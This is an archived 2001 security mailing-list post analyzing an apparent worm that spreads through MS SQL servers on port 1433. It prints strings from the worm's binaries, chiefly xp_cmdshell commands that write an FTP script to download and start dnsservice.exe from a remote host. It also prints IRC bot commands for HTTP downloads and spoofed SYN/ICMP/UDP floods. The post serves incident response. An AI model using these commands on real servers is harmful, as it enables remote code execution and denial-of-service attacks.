On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote: > > We saw a scan come in looking for systems answering on 1433, and > immediately saw several systems start scanning out for other systems > answering on 1433 - worm behavior? Has anyone else seen this? No, but the binaries it downloads: win32mon.exe and dnsservice.exe Are on the ftp site in the dump. I don't have a windows debugger to put them through but they look interesting: exec xp_cmdshell 'start dnsservice.exe' exec xp_cmdshell 'del ftp.x' exec xp_cmdshell 'ftp -s:ftp.x exec xp_cmdshell 'echo quit >> ftp.x' exec xp_cmdshell 'echo close >> ftp.x' exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x' exec xp_cmdshell 'echo cd tmp>> ftp.x' exec xp_cmdshell 'echo cd pub>> ftp.x' exec xp_cmdshell 'echo bin>> ftp.x' exec xp_cmdshell 'echo foo.com>> ftp.x' exec xp_cmdshell 'echo ftp> ftp.x' GET /%s HTTP/1.0 Connection: Keep-Alive User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) [GET] - Unable to connect to http. [GET] - Unable to resolve host. http:// [GET] - Unable to create new socket. GET <bot|wildcard> <host> <save as> %s %s %s %s NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu) NICK %s NOTICE %s :Nick cannot be larger than 9 characters. NOTICE %s :NICK <nick> sm6 has finished... with tcp/syn boost! sm6 icmp/udp has begun... sm6 icmp/udp (w/pkt-push!) has begun.. Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file> etc. Paul Nasrat ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 10:23:11 PST